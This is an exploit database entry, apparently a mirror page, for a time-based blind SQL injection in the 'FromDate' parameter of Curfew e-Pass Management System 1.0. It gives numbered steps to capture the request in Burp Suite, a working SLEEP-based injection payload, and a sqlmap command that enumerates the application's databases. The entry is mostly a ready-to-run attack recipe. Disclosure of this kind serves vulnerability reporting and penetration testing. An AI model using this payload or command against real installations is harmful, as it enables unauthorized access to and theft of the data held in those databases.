[] NeoSense
E X P L O I T S
title author type platform port cve id

Curfew e-Pass Management System 1.0 - FromDate SQL Injection

Author: Puja Dey
type: webapps
platform: php
port: 
date_added: 2024-02-05 
date_updated: 2024-02-05 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
Injection
# Date: 28/9/2023
# Exploit Author: Puja Dey
# Vendor Homepage: https://phpgurukul.com
# Software Link:
https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp

1) login into the application
2) click on report on pass and capture the request in burpsuite
3) Parameter "FromDate" is vulnerable to SQL Injection
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
'SOzQ'='SOzQ&todate=&submit=
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agent
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.